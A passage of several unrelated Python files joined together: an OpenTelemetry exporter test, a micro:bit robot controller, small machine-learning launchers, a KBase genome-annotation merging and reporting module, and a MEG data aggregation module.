trace_id, 0x2222222222222222, is_remote=False
)
span1 = SDKSpan(
name="test-span-1",
context=SDKSpanContext(
trace_id,
0x34BF92DEEFC58C92,
is_remote=False,
trace_flags=SDKTraceFlags(SDKTraceFlags.SAMPLED),
),
parent=parent_span_context,
events=(
SDKEvent(
name="event0",
timestamp=base_time + 50 * 10 ** 6,
attributes={
"annotation_bool": True,
"annotation_string": "annotation_test",
"key_float": 0.3,
},
),
),
links=(
SDKLink(context=other_context, attributes={"key_bool": True}),
),
resource=SDKResource({}),
)
span1.start(start_time=start_times[0])
span1.set_attribute("key_bool", False)
span1.set_attribute("key_string", "hello_world")
span1.set_attribute("key_float", 111.22)
span1.set_status(SDKStatus(SDKStatusCode.ERROR, "Example description"))
span1.end(end_time=end_times[0])
span2 = SDKSpan(
name="test-span-2",
context=parent_span_context,
parent=None,
resource=SDKResource(attributes={"key_resource": "some_resource"}),
)
span2.start(start_time=start_times[1])
span2.end(end_time=end_times[1])
span3 = SDKSpan(
name="test-span-3",
context=other_context,
parent=None,
resource=SDKResource(attributes={"key_resource": "some_resource"}),
)
span3.start(start_time=start_times[2])
span3.set_attribute("key_string", "hello_world")
span3.end(end_time=end_times[2])
span4 = SDKSpan(
name="test-span-4",
context=other_context,
parent=None,
resource=SDKResource({}),
instrumentation_info=SDKInstrumentationInfo(
name="name", version="version"
),
)
span4.start(start_time=start_times[3])
span4.end(end_time=end_times[3])
return [span1, span2, span3, span4]
def get_exhaustive_test_spans(
self,
) -> Tuple[List[SDKSpan], PB2ExportTraceServiceRequest]:
otel_spans = self.get_exhaustive_otel_span_list()
trace_id = _encode_trace_id(otel_spans[0].context.trace_id)
span_kind = _SPAN_KIND_MAP[SDKSpanKind.INTERNAL]
pb2_service_request = PB2ExportTraceServiceRequest(
resource_spans=[
PB2ResourceSpans(
resource=PB2Resource(),
instrumentation_library_spans=[
PB2InstrumentationLibrarySpans(
instrumentation_library=PB2InstrumentationLibrary(),
spans=[
PB2SPan(
trace_id=trace_id,
span_id=_encode_span_id(
otel_spans[0].context.span_id
),
trace_state=None,
parent_span_id=_encode_span_id(
otel_spans[0].parent.span_id
),
name=otel_spans[0].name,
kind=span_kind,
start_time_unix_nano=otel_spans[
0
].start_time,
end_time_unix_nano=otel_spans[0].end_time,
attributes=[
PB2KeyValue(
key="key_bool",
value=PB2AnyValue(
bool_value=False
),
),
PB2KeyValue(
key="key_string",
value=PB2AnyValue(
string_value="hello_world"
),
),
PB2KeyValue(
key="key_float",
value=PB2AnyValue(
double_value=111.22
),
),
],
events=[
PB2SPan.Event(
name="event0",
time_unix_nano=otel_spans[0]
.events[0]
.timestamp,
attributes=[
PB2KeyValue(
key="annotation_bool",
value=PB2AnyValue(
bool_value=True
),
),
PB2KeyValue(
key="annotation_string",
value=PB2AnyValue(
string_value="annotation_test"
),
),
PB2KeyValue(
key="key_float",
value=PB2AnyValue(
double_value=0.3
),
),
],
)
],
links=[
PB2SPan.Link(
trace_id=_encode_trace_id(
otel_spans[0]
.links[0]
.context.trace_id
),
span_id=_encode_span_id(
otel_spans[0]
.links[0]
.context.span_id
),
attributes=[
PB2KeyValue(
key="key_bool",
value=PB2AnyValue(
bool_value=True
),
),
],
)
],
status=PB2Status(
deprecated_code=PB2Status.DEPRECATED_STATUS_CODE_UNKNOWN_ERROR, # pylint: disable=no-member
code=SDKStatusCode.ERROR.value,
message="Example description",
),
)
],
),
PB2InstrumentationLibrarySpans(
instrumentation_library=PB2InstrumentationLibrary(
name="name",
version="version",
),
spans=[
PB2SPan(
trace_id=trace_id,
span_id=_encode_span_id(
otel_spans[3].context.span_id
),
trace_state=None,
parent_span_id=None,
name=otel_spans[3].name,
kind=span_kind,
start_time_unix_nano=otel_spans[
3
].start_time,
end_time_unix_nano=otel_spans[3].end_time,
attributes=None,
events=None,
links=None,
status={},
)
],
),
],
),
PB2ResourceSpans(
resource=PB2Resource(
attributes=[
PB2KeyValue(
key="key_resource",
value=PB2AnyValue(
string_value="some_resource"
),
)
]
),
instrumentation_library_spans=[
PB2InstrumentationLibrarySpans(
instrumentation_library=PB2InstrumentationLibrary(),
spans=[
PB2SPan(
trace_id=trace_id,
span_id=_encode_span_id(
otel_spans[1].context.span_id
),
trace_state=None,
parent_span_id=None,
name=otel_spans[1].name,
kind=span_kind,
start_time_unix_nano=otel_spans[
1
].start_time,
end_time_unix_nano=otel_spans[1].end_time,
attributes=None,
events=None,
links=None,
status={},
),
PB2SPan(
trace_id=trace_id,
span_id=_encode_span_id(
otel_spans[2].context.span_id
),
trace_state=None,
parent_span_id=None,
name=otel_spans[2].name,
kind=span_kind,
start_time_unix_nano=otel_spans[
2
].start_time,
end_time_unix_nano=otel_spans[2].end_time,
attributes=[
PB2KeyValue(
key="key_string",
value=PB2AnyValue(
string_value="hello_world"
),
),
],
events=None,
links=None,
status={},
),
],
)
],
),
]
)
return otel_spans, pb2_service_request
def test_encode_status_code_translations(self):
self.assertEqual(
_encode_status(SDKStatus(status_code=SDKStatusCode.UNSET)),
PB2Status(
deprecated_code=PB2Status.DEPRECATED_STATUS_CODE_OK, # pylint: disable=no-member
code=SDKStatusCode.UNSET.value,
),
)
self.assertEqual(
_encode_status(SDKStatus(status_code=SDKStatusCode.OK)),
PB2Status(
deprecated_code=PB2Status.DEPRECATED_STATUS_CODE_OK, # pylint: disable=no-member
code=SDKStatusCode.OK.value,
),
)
self.assertEqual(
_encode_status(SDKStatus(status_code=SDKStatusCode.ERROR)),
PB2Status(
deprecated_code=PB2Status.DEPRECATED_STATUS_CODE_UNKNOWN_ERROR, # pylint: disable=no-member
code=SDKStatusCode.ERROR.value,
),
)
|
from microbit import *
import radio
CHANNEL = 19
# Movement functions
def drive_forwards(speed):
pin8.write_digital(0)
pin12.write_digital(0)
pin0.write_analog(speed/100*1023)
pin1.write_analog(speed/100*1023)
def reverse_arc_left():
pin8.write_digital(1)
pin12.write_digital(1)
pin0.write_analog(700)
pin1.write_analog(400)
is_driving_forwards = True
radio.config(channel=CHANNEL)
radio.on()
# Stopped at first then moving forwards or reversing to the left
while True:
msg = radio.receive()
if msg is not None:
if msg == 'FORWARDS':
display.show(Image.ARROW_N)
drive_forwards(50)
elif msg == 'REVERSE_LEFT':
display.show(Image.ARROW_SW)
reverse_arc_left()
|
from stella.preprocessing_flares import *
from numpy.testing import assert_almost_equal
pre = FlareDataSet(fn_dir='.',
catalog='Guenther_2020_flare_catalog.txt')
def test_processing():
assert_almost_equal(pre.frac_balance, 0.7, decimal=1)
assert(pre.train_data.shape == (62, 200, 1))
assert(pre.val_data.shape == (8, 200, 1))
assert(pre.test_data.shape == (8, 200, 1))
|
from src import mnist
from src import cnn
from src import rnn
|
import cxr_dataset as CXR
import eval_model as E
import model as M
# you will need to customize PATH_TO_IMAGES to where you have uncompressed
# NIH images
if __name__ == '__main__':
PATH_TO_IMAGES = "C:/Users/User/Desktop/Hibah Dikti/DB/images"
WEIGHT_DECAY = 1e-4
LEARNING_RATE = 0.01
preds, aucs = M.train_cnn(PATH_TO_IMAGES, LEARNING_RATE, WEIGHT_DECAY) |
from nlp.bp import bp
from nlp.bp import mnist_loader
net = bp.Network([784, 100, 10])
training_data, validation_data, test_data = mnist_loader.load_data_wrapper()
net.SGD(training_data, 30, 10, 3.0, test_data=test_data)
|
import pandas as pd
import os
import logging
import yaml
import datetime
import json
import time
import sys
import holoviews as hv
from holoviews import opts
from holoviews.element import Div
from bokeh.models import HoverTool
hv.extension('bokeh')
allowed_ontologies = ["KO", "EC", "SSO", "RO", "META", "MSRXN",
"MSCPD", "MSCPX", "BIGG", "BIGGCPD", "GO", "TC", "RHEA"]
def df_to_ontology(params, pass_df=None, method="Import Annotations"):
'''
Takes the text file from staging, or the pandas df passed from the merge
app, and converts to an ontology dictionary suitable from the annotation
ontology API add_annotation_ontology_events() method
The merge app also calls this, and it can use the same params that the
import gives... all shared features are in both (except for the
annotations_file which the html_add_ontology_summary needs to fix)
The new bulk app also calls this, using pass_df and a "fake" params
'''
if isinstance(pass_df, pd.DataFrame):
annotations = pass_df
else:
if 'debug' in params and params['debug'] is True:
annotations_file_path = os.path.join(
'/kb/module/test/test_data', params['annotation_file'])
else:
annotations_file_path = os.path.join("/staging/", params['annotation_file'])
annotations = pd.read_csv(annotations_file_path,
sep='\t',
header=None,
names=['gene', 'term']
)
# remove duplicate rows, if any
annotations = annotations.drop_duplicates()
ontology = {
'event_id': params['description'],
'description': params['description'],
'ontology_id': params['ontology'],
'method': method, # from above
'method_version': get_app_version(),
"timestamp": datetime.datetime.now().strftime("%Y_%m_%d_%H_%M_%S"),
'ontology_terms': {},
'gene_count': int(annotations['gene'].nunique()), # not used in the api
'term_count': int(annotations['term'].nunique()) # not used in the api
}
# add imported terms
for index, row in annotations.iterrows():
if pd.notnull(row['term']):
if row['gene'] in ontology['ontology_terms']:
ontology['ontology_terms'][row['gene']].append(
{'term': row['term']}
)
else:
ontology['ontology_terms'][row['gene']] = [
{'term': row['term']}
]
return [ontology]
def bulk_df_to_ontology(params):
ontologies = []
if 'debug' in params and params['debug'] is True:
annotations_file_path = os.path.join(
'/kb/module/test/test_data', params['annotation_file'])
else:
annotations_file_path = os.path.join("/staging/", params['annotation_file'])
annotations = pd.read_csv(annotations_file_path,
sep='\t',
header=None,
names=['gene', 'term', 'ontology', 'description']
)
for description, description_df in annotations.groupby(annotations['description']):
for ontology, ontology_df in description_df.groupby(description_df['ontology']):
if ontology.upper() not in allowed_ontologies:
sys.exit(f"ERROR: {ontology} is not a valid Ontology string")
time.sleep(2) # This just "guarantees" the timestamps will all be different
ontology_df = ontology_df[ontology_df['term'].notna()]
ontology_df = ontology_df.drop_duplicates()
ontology = {
'event_id': description,
'description': description,
'ontology_id': ontology.upper(),
'method': "Import Bulk Annotations",
'method_version': get_app_version(),
"timestamp": datetime.datetime.now().strftime("%Y_%m_%d_%H_%M_%S"),
'ontology_terms': {},
'gene_count': int(ontology_df['gene'].nunique()), # not used in the api
'term_count': int(ontology_df['term'].nunique()) # not used in the api
}
# add imported terms
for index, row in ontology_df.iterrows():
if pd.notnull(row['term']):
if row['gene'] in ontology['ontology_terms']:
ontology['ontology_terms'][row['gene']].append(
{'term': row['term']}
)
else:
ontology['ontology_terms'][row['gene']] = [
{'term': row['term']}
]
ontologies.append(ontology)
logging.info(len(ontology['ontology_terms']))
for gene in ontology['ontology_terms']:
logging.info(description + "\t" + gene)
return ontologies
def get_app_version():
with open("/kb/module/kbase.yml", 'r') as stream:
data_loaded = yaml.load(stream)
return str(data_loaded['module-version'])
def html_header():
report = []
report.append("<style>* {font-family: sans-serif; font-size: 14px}</style>")
return report
def html_add_ontology_summary(params, ontology, api_results, output_directory):
logging.info(api_results)
output_file = os.path.join(output_directory, "add_ontology_summary.html")
# Make report directory and copy over files
report = html_header()
report.append(f'<h3>Import Annotations Summary</h3>')
report.append(f'<b>Import App version:</b> {get_app_version()}<br>')
if "annotation_file" in params:
report.append(f'<b>Annotations file:</b> {params["annotation_file"]}<br>')
report.append(f'<b>Input Ref:</b> {params["genome"]}<br>')
report.append(f'<b>Output Ref:</b> {api_results["output_ref"]}<br>')
report.append(f'<b>Output Name:</b> {api_results["output_name"]}<br><br>')
report.append(f'<b>Features (found):</b> {api_results["ftrs_found"]}<br>')
report.append(f'<b>Features (not found):</b> {len(api_results["ftrs_not_found"])}<br><br>')
# make table
report.append(
'<table cellspacing="0" cellpadding="3" border="1"><tr><th>Description</th><th>Timestamp</th><th>Ontology</th><th>Genes in file</th><th>Terms in file</th></tr>')
for import_event in ontology:
gene_count = len(import_event["ontology_terms"])
# term_count =
report.append(
f'<tr style="background-color:#EEEEEE"><td>{import_event["description"].split(":")[0]}</td><td>{import_event["timestamp"]}</td><td>{import_event["ontology_id"]}</td><td>{import_event["gene_count"]}</td><td>{import_event["term_count"]}</td></tr>')
report.append('</table>')
# add missing terms
if len(api_results["ftrs_not_found"]) > 0:
report.append(
f'<br><b>These genes were not found in the genome:</b> <br>{("<br>").join(api_results["ftrs_not_found"])}<br>')
# Write to file
with open(output_file, 'w') as f:
for line in report:
f.write(line + "\n")
return {'path': output_directory,
'name': os.path.basename(output_file),
'description': 'HTML report for import_annotations app'}
def get_event_lists(ontology):
# print(type(ontology['feature_types']))
gene_features = [k for k, v in ontology['feature_types'].items() if v == "gene"]
events = {}
for event in ontology["events"]:
event_id = event['event_id']
events[event_id] = {'genes': [],
'terms': [],
'msrxns': [],
'gene_msrxns': [],
'description': event['description'],
'timestamp': event['timestamp'],
'method': event['method'],
'method_version': event['method_version'],
'ontology_id': event['ontology_id']
}
for gene in event["ontology_terms"]:
if gene in gene_features:
events[event_id]['genes'].append(gene)
for entry in event["ontology_terms"][gene]:
if "term" in entry.keys():
events[event_id]['terms'].append(entry['term'])
if "modelseed_ids" in entry.keys():
events[event_id]['msrxns'] += entry['modelseed_ids']
for msrxn in entry['modelseed_ids']:
events[event_id]['gene_msrxns'].append(gene + '_' + msrxn)
events[event_id]['genes'] = list(set(events[event_id]['genes']))
events[event_id]['terms'] = list(set(events[event_id]['terms']))
events[event_id]['msrxns'] = list(set(events[event_id]['msrxns']))
events[event_id]['gene_msrxns'] = list(set(events[event_id]['gene_msrxns']))
return events
def html_get_ontology_summary(event_summary, output_directory, to_highlight=[]):
'''
Only counts gene features, ignores cds
The highlight part is a list of descriptions to have their rows highlighted.
'''
output_file = os.path.join(output_directory, "get_ontology_summary.html")
report = html_header()
report.append(f'<h3>Compare Annotations Summary</h3>')
report.append(
'<table cellspacing="0" cellpadding="3" border="1"><tr><th>Description</th><th>Timestamp</th><th>KBase App</th><th>Ontology</th><th>Genes</th><th>Unique Terms</th><th>Unique ModelSEED rxns</th><th>Unique Gene/ModelSEED rxn pairs</th></tr>')
# get counts and add to new line of table
for event in event_summary:
if event_summary[event]["description"] in to_highlight:
report.append(f'<tr style="background-color:#6CD075"><td>{event_summary[event]["description"].split(":")[0]}</td><td>{event_summary[event]["timestamp"]}</td><td>{event_summary[event]["method"]} v{event_summary[event]["method_version"]}</td><td>{event_summary[event]["ontology_id"]}</td><td>{len(event_summary[event]["genes"])}</td><td>{len(event_summary[event]["terms"])}</td><td>{len(event_summary[event]["msrxns"])}</td><td>{len(event_summary[event]["gene_msrxns"])}</td></tr>')
else:
report.append(f'<tr><td>{event_summary[event]["description"].split(":")[0]}</td><td>{event_summary[event]["timestamp"]}</td><td>{event_summary[event]["method"]} v{event_summary[event]["method_version"]}</td><td>{event_summary[event]["ontology_id"]}</td><td>{len(event_summary[event]["genes"])}</td><td>{len(event_summary[event]["terms"])}</td><td>{len(event_summary[event]["msrxns"])}</td><td>{len(event_summary[event]["gene_msrxns"])}</td></tr>')
report.append('</table>')
if len(to_highlight) > 0:
report.append(
f'<span style="background-color:#6CD075;font-size:12px"><i>* these highlighted rows were used for the merge</i></span>')
print(output_file)
# Write to file
with open(output_file, 'w') as f:
for line in report:
f.write(line + "\n")
return {'path': output_directory,
'name': os.path.basename(output_file),
'description': 'Summary Report'}
def merge_details_report(df, output_directory):
output_file = os.path.join(output_directory, "merge_details.txt")
df.to_csv(output_file, sep="\t", index=False)
return {'path': output_directory,
'name': os.path.basename(output_file),
'description': 'Merge Details'}
def filter_selected_ontologies(ontology, params, workflow="compare"):
'''
unique will not use params and just give all unique event_ids.
compare and merge workflows filter out the ontologies to those selected in
the UI, but the merge workflow also adds the annotation_weights to the
events. both return all unique if no events are selected, and defaulting to
a weight of 1 for the merge
The unique functionality is added because of a current bug
'''
ontology_selected = {"events": [],
"feature_types": ontology["feature_types"]}
added_ontologies = []
# the list of selections have different names depending on the app
if workflow == "compare":
selected_events = params['annotations_to_compare']
elif workflow == "merge":
selected_events = params['annotations_to_merge']
elif workflow == "unique":
selected_events = []
for event in ontology["events"]:
if event["description"] not in added_ontologies: # keeps duplicates from being added twice
if workflow == "unique": # add all, don't filter
ontology_selected['events'].append(event)
added_ontologies.append(event["description"])
else:
if len(selected_events) == 0: # if nothing is selected, then grab all events
if workflow == "merge":
event['annotation_weight'] = 1
ontology_selected['events'].append(event)
added_ontologies.append(event["description"])
else: # then grab only events in selected events, which is different for compare vs merge
if workflow == "compare":
if event["description"] in selected_events:
ontology_selected['events'].append(event)
added_ontologies.append(event["description"])
elif workflow == "merge":
for selected_event in selected_events:
# add if event in selected events, or if the first annotation_source is empty
if event["description"] in selected_event["annotation_source"] or len(selected_events[0]['annotation_source']) == 0:
event['annotation_weight'] = selected_event["annotation_weight"]
ontology_selected['events'].append(event)
added_ontologies.append(event["description"])
return ontology_selected
def merge_ontology_events(ontology):
'''
The annotation ontology api can put annotations in the cds features as well
as the gene features. This code only considers gene features, and ignores
annotations in cds features. I think they only get added to cds features if
they were aliases
Now, adds to a dictionary by gene/rxn/event... this will keep an event from
double dipping and scoring twice for a gene_msrxn pair
'''
# get counts and add to new line of table
gene_features = [k for k, v in ontology['feature_types'].items() if v == "gene"]
ontology_merged = {}
for event in ontology["events"]:
event_id = event['event_id']
for gene in event["ontology_terms"]:
if gene in gene_features:
for entry in event["ontology_terms"][gene]:
if "modelseed_ids" in entry.keys():
for MSRXN in entry['modelseed_ids']:
if gene in ontology_merged:
if MSRXN in ontology_merged[gene]:
ontology_merged[gene][MSRXN][event_id] = event['annotation_weight']
else:
ontology_merged[gene][MSRXN] = {
event_id: event['annotation_weight']}
else:
ontology_merged[gene] = {
MSRXN: {event_id: event['annotation_weight']}}
return ontology_merged
def score_mergers(ontology_merged, params):
'''
returns a pandas dataframe suitable for the import annotations workflow
'''
df = pd.DataFrame(columns=['gene', 'term', 'score', 'gene_treshold'])
for gene_id in ontology_merged:
if params["keep_best_annotation_only"] == 1:
best_score = 0
for MSRXN in ontology_merged[gene_id]:
MSRXN_sum = sum(ontology_merged[gene_id][MSRXN].values())
if MSRXN_sum > best_score:
best_score = MSRXN_sum
# if best only is true and best_score is above threshold, use best_score as new threshold
if best_score > params["annotation_threshold"]:
gene_threshold = best_score
else:
gene_threshold = params["annotation_threshold"]
else:
gene_threshold = params["annotation_threshold"]
for MSRXN in ontology_merged[gene_id]:
MSRXN_sum = sum(ontology_merged[gene_id][MSRXN].values())
event_series = pd.Series(ontology_merged[gene_id][MSRXN])
# logging.info(
# gene_id + "\t" + MSRXN + "\t" + str(ontology_merged[gene_id][MSRXN]) + "\t" + str(MSRXN_sum) + "\t" + str(gene_threshold))
score_series = pd.Series(data={
'gene': gene_id,
'term': MSRXN,
'score': MSRXN_sum,
'gene_treshold': gene_threshold})
score_series = score_series.append(event_series)
if MSRXN_sum >= gene_threshold:
score_series = score_series.append(pd.Series({'pass': 1}))
else:
score_series = score_series.append(pd.Series({'pass': 0}))
df = df.append(score_series, ignore_index=True)
# returns all results
return df
def plot_totals(event_summary, output_directory, descript_truncate=20):
df = pd.DataFrame(columns=['DESCRIPTION', 'GENES', 'TERMS', 'MSRXNS', 'GENE_MSRXNS'])
for event in event_summary:
df = df.append(pd.Series(data={
'DESCRIPTION': event_summary[event]["description"][:descript_truncate] + "...",
'GENES': len(event_summary[event]["genes"]),
'TERMS': len(event_summary[event]["terms"]),
'MSRXNS': len(event_summary[event]["msrxns"]),
'GENE_MSRXNS': len(event_summary[event]["gene_msrxns"])}),
ignore_index=True)
df = pd.melt(df, id_vars=['DESCRIPTION'], var_name="TYPE", value_name="COUNT")
def group_by(group, **kwargs):
if group == "Description":
bars = hv.Bars(df, kdims=['DESCRIPTION', 'TYPE'])
elif group == "Type":
bars = hv.Bars(df, kdims=['TYPE', 'DESCRIPTION'])
return bars
sets = ['Description', 'Type']
bars = hv.DynamicMap(group_by, kdims='Group').redim.values(Group=sets)
bars.opts(
opts.Bars(color=hv.Cycle('Colorblind'), show_legend=False, stacked=False,
tools=['hover'], width=150*len(event_summary.keys()), height=600, xrotation=90))
p_path = os.path.join(output_directory, 'totals.html')
caption = hv.Div("""
This plot summarizes all of the unique features found in a genome object,
grouped either by feature type (genes, unique terms, unique ModelSEED reactions,
and unique gene/ModelSEED reaction pairs), or annotation description (that is,
annotation source). Descriptions are truncated to first 20 characters.
""").opts(width=150*len(event_summary.keys()))
layout = hv.Layout(bars + caption).cols(1)
hv.output(widget_location='top')
hv.save(layout, p_path, backend='bokeh')
return {'path': output_directory,
'name': os.path.basename(p_path),
'description': 'Totals Report'}
def plot_agreements(event_summary, output_directory, descript_truncate=25):
def load_it_up(annotation_type, **kwargs):
shared_genes = pd.DataFrame(columns=['A', 'B', 'AGREE', 'DISAGREE'])
for event1 in event_summary:
a = set(event_summary[event1][annotation_type])
for event2 in event_summary:
if event1 != event2:
b = set(event_summary[event2][annotation_type])
shared_genes = shared_genes.append(pd.Series(data={
'A': event1[:descript_truncate] + "...", 'B': event2[:descript_truncate] + "...", 'AGREE': len(a & b), 'DISAGREE': len(a - b)}), ignore_index=True)
else:
shared_genes = shared_genes.append(pd.Series(data={
'A': event1[:descript_truncate] + "...", 'B': event2[:descript_truncate] + "...", 'AGREE': None, 'DISAGREE': None}), ignore_index=True)
h1 = hv.HeatMap(shared_genes, ['A', 'B'], ['AGREE', 'DISAGREE'],
label="Agree (in row and column)")
h2 = hv.HeatMap(shared_genes, ['A', 'B'], ['DISAGREE', 'AGREE'],
label="Disagree (in column only)")
h1.opts(cmap='bgy')
h2.opts(cmap='YlOrRd')
caption = hv.Div("""
These plot shows the pairwise agreements (left) and disagreements (right)
between annotation events in a genome object.
The agreements plot is symmetrical, showing the total annotation types
found in both the row and the column events.
The disagreements plot is non-symmetrical, showing the count of unique
annotation types found in the column event, but missing from the row
event. Descriptions are truncated to the first 20 characters.
""").opts(width=500)
return (h1 + h2 + caption).cols(2)
sets = ['genes', 'msrxns', 'gene_msrxns']
heatmap = hv.DynamicMap(load_it_up, kdims='Type').redim.values(Type=sets)
hover = HoverTool(tooltips=[("Column", "@A"),
("Row", "@B"),
("Agree", "@AGREE"),
("Disagree", '@DISAGREE')])
heatmap.opts(
opts.HeatMap(width=200+45*len(event_summary.keys()),
height=100+45*len(event_summary.keys()),
tools=[hover],
axiswise=False,
logz=False,
invert_yaxis=True,
labelled=[],
toolbar='right',
colorbar=True,
xrotation=30),
opts.VLine(line_color='black'))
p_path = os.path.join(output_directory, 'agreements.html')
hv.output(widget_location='top')
hv.save(heatmap, p_path, backend='bokeh')
return {'path': output_directory,
'name': os.path.basename(p_path),
'description': 'Agreements Report'}
def compare_report_stack(html_reports, event_summary, output_directory, to_highlight=[]):
html_reports.append(html_get_ontology_summary(event_summary, output_directory, to_highlight))
html_reports.append(plot_totals(event_summary, output_directory))
html_reports.append(plot_agreements(event_summary, output_directory))
html_reports.append(plot_csc(event_summary, output_directory))
return html_reports
def plot_csc(event_summary, output_directory, descript_truncate=50):
def get_longest(type, modified_event_summary, aggregated_events):
current_longest = {'description': '', 'a': 0}
for event in modified_event_summary:
a = len(list(set(modified_event_summary[event][type]) - set(aggregated_events)))
if a >= current_longest['a']: # need >= in case the last one is 0
current_longest = {'description': event, 'a': a}
return current_longest['description']
def load_it_up(type, **kwargs):
processed_events = {}
aggregated_events = []
original_event_count = len(event_summary.keys())
modified_event_summary = event_summary.copy()
# bar_order = []
baseline = 0
df = pd.DataFrame(columns=['DESCRIPTION', 'COMPARISON', 'COUNT'])
while len(processed_events.keys()) < original_event_count:
l = modified_event_summary.pop(get_longest(
type, modified_event_summary, aggregated_events))
new_events = l[type]
sub_baseline = baseline
# get what overlaps with already processed events
for event in processed_events:
overlap = set(new_events) & set(processed_events[event])
new_events = set(new_events) - set(processed_events[event])
df = df.append(pd.Series(data={
'DESCRIPTION': l['description'][:descript_truncate], 'COMPARISON': event[:descript_truncate], 'COUNT': len(overlap), 'HIGH': sub_baseline, 'LOW': sub_baseline-len(overlap)}), ignore_index=True)
sub_baseline -= len(overlap)
processed_events[l['description']] = new_events
aggregated_events = list(set(aggregated_events).union(set(new_events)))
# if anything is left, add it has new events
df = df.append(pd.Series(data={
'DESCRIPTION': l['description'][:descript_truncate], 'COMPARISON': l['description'][:descript_truncate], 'COUNT': len(new_events), 'HIGH': baseline + len(new_events), 'LOW': baseline}), ignore_index=True)
baseline = len(aggregated_events)
# # flip the df order so plot order is flipped.
df = df.loc[::-1].reset_index(drop=True)
seg = hv.Segments(df, [hv.Dimension('LOW', label='Count'),
hv.Dimension('DESCRIPTION', label='Genome Event'),
'HIGH',
'DESCRIPTION'])
return seg
sets = ['genes', 'msrxns', 'gene_msrxns']
seg = hv.DynamicMap(load_it_up, kdims='Type').redim.values(Type=sets)
csc_hover = HoverTool(tooltips=[("Main", "@DESCRIPTION"),
("Comp", "@COMPARISON"),
("Count", "@COUNT")])
seg.opts(line_width=40, color='COMPARISON', cmap='bgy_r', height=100+50*len(event_summary.keys()),
width=800, tools=[csc_hover], invert_axes=False, xrotation=90)
# bars.opts(
# opts.Bars(color=hv.Cycle('Colorblind'), invert_axes=True, show_legend=False, stacked=True,
# tools=['hover'], width=1000, height=100+50*len(event_summary.keys()), xrotation=90))
caption = hv.Div("""
This cumulative sum plot shows how the addition of new annotation events
increases the unique list of features. The y-axis is ranked so the annotation event at the top
contributes the most new knowledge, followed by the next event down, etc.
The x-axis shows a count of these new annotation types, and are color coded
for new annotations, or by the 'highest' annotation event that it overlaps.
""").opts(width=800)
layout = hv.Layout(seg + caption).cols(1)
p_path = os.path.join(output_directory, 'csc.html')
hv.output(widget_location='top')
hv.save(layout, p_path, backend='bokeh')
return {'path': output_directory,
'name': os.path.basename(p_path),
'description': 'CSC Report'}
if __name__ == "__main__":
ontology_selected = json.loads(
open("/Users/kimbrel1/Desktop/get_ontology_dump_after_merge.json", "r").read())
d = get_event_lists(ontology_selected)
p_path = plot_totals(d, "/Users/kimbrel1/Desktop/")
p_path = plot_csc(d, "/Users/kimbrel1/Desktop/")
p_path = plot_agreements(d, "/Users/kimbrel1/Desktop/")
print(p_path)
|
"""
Aggregate source reconstructed files across chunks and sessions into
one unified format.
Aggregation will combine individual ROIs into larger clusters more
suitable for MEG data.
The source reconstruction process outputs data frames that are
indexed by time, est_val, est_type, epoch etc. in the rows
and ROIs in the columns:
lh.wang2015atlas.V1v-lh ...
trial time est_key est_val
506 -1.500000 F 10 2.206130e-25 ...
-1.483333 F 10 3.374152e-25 ...
-1.466667 F 10 4.967676e-25 ...
-1.450000 F 10 6.293999e-25 ...
-1.433333 F 10 6.862688e-25 ...
After aggregation all chunks from one session will be combined. ROIs
will be aggregated into clusters. baseline corrected and converted to
percent signal change. Cluster can be averaged across hemis,
be lateralized or kept as is. The resulting structure is:
time -0.750000 ...
hemi cluster trial freq
Averaged HCPMMP1_audiotory_association 503 10 -73.221365 ...
504 10 -66.933821 ...
505 10 -64.982795 ...
506 10 -69.250634 ...
507 10 -35.822782 ...
Aggregated files can be saved in matlab readable HDF files. These
files are organized as follows:
/Averaged
/Cluster 1
- freq A: 2D dataset (trial x time)
- freq B ...
/Cluster 2
...
/Lateralized
...
Indices into the rows and columns of individual datasets are stored
in their attributes.
"""
import pandas as pd
import numpy as np
def aggregate_files(data_globstring, base_globstring, baseline_time,
hemis=['Averaged', 'Pair', 'Lateralized'],
cache=None):
"""Read source reconstructed files, compute power spectra during
prestimulus baseline, and aggregate into area clusters.
Args:
data_globstring: globstring that selects data files
base_globstring: globstring that selects baseline files
baseline_time: 2-tuple
Defines time to use for computing spectra
hemis: List of strings
Can contain the following:
'Averaged': Mean over hemispheres per area
'Pair': Return areas as they are per hemisphere
'Lateralized': Subtract left from right hemisphere
Returns:
DataFrame that contains time points as columns and is indexed
by time, frequency and cluster in the row index.
"""
from pymeg.contrast_tfr import Cache
tfr_baseline = None
if not (data_globstring == base_globstring):
with Cache() as base_cache:
tfr_baseline = base_cache.get(base_globstring)
tfr_baseline = tfr_baseline.groupby(['freq', 'area']).mean()
if cache is None:
cache = Cache()
tfr_data = cache.get(data_globstring)
baseline = tfr_data.loc[:, slice(*baseline_time)] # this is now BB signal only from baseline period
nsmps = baseline.shape[1] # get number of samples in baseline period
# basepow = baseline.apply(np.fft.fft) # run fft ### THIS WOULD BE WAY BETTER BUT DOESN'T SEEM TO WORK
basepowA = np.fft.fft(baseline.values) # run ffts
basepowA = np.abs(basepowA)**2 # compute power spectra
basepow = tfr_data.loc[:, slice(*baseline_time)] # copying DataFrame
for f in range(0,nsmps):
print(f)
basepow.iloc[:,f] = basepowA[:,f] # replace raw data with power spectra (very stupid way to go about this...)
freqs = np.fft.fftfreq(nsmps)*400 # get freqs vector to go along with power values
basepow.columns = freqs # replace times vector for column headers with power spectrum freqs vector
aggs = aggregate(basepow, hemis) # aggregate
return aggs
def agg2hdf(agg, filename):
"""Convert an aggregate into a HDF file.
The resulting HDF file encodes the hemi and cluster
index hierarchically as groups. Each frequency is a dataset
that is itself 2D: trials x time.
Indices into the 2D datasets are saved in the datasets attrs.
Row indices are prefixed with 'rows_' and column indices with
'cols_'.
Args:
agg: DataFrame
filename: str
Path to file.
"""
import h5py
with h5py.File(filename, mode='w') as store:
for (hemi, cluster, freq), data in agg.groupby(['hemi', 'cluster', 'freq']):
try:
grp = store.create_group(hemi + '/' + cluster)
except ValueError:
grp = store[hemi + '/' + cluster]
dset = grp.create_dataset(
str(freq), data=data.values, compression="gzip", compression_opts=7)
dset.attrs['cols_time'] = data.columns.values.astype(float)
for index in data.index.names:
index_vals = data.index.get_level_values(index).values
if index_vals.dtype == object:
index_vals = [str(i).encode('utf-8') for i in index_vals]
dset.attrs[
'rows_' + index] = index_vals
def delayed_agg(filename, hemi=None, cluster=None, freq=None):
from functools import partial
return partial(hdf2agg, filename, hemi=hemi, cluster=cluster, freq=freq)
def hdf2agg(filenames, hemi=None, cluster=None, freq=None):
return pd.concat([_hdf2agg(f, hemi, cluster, freq)
for f in ensure_iter(filenames)])
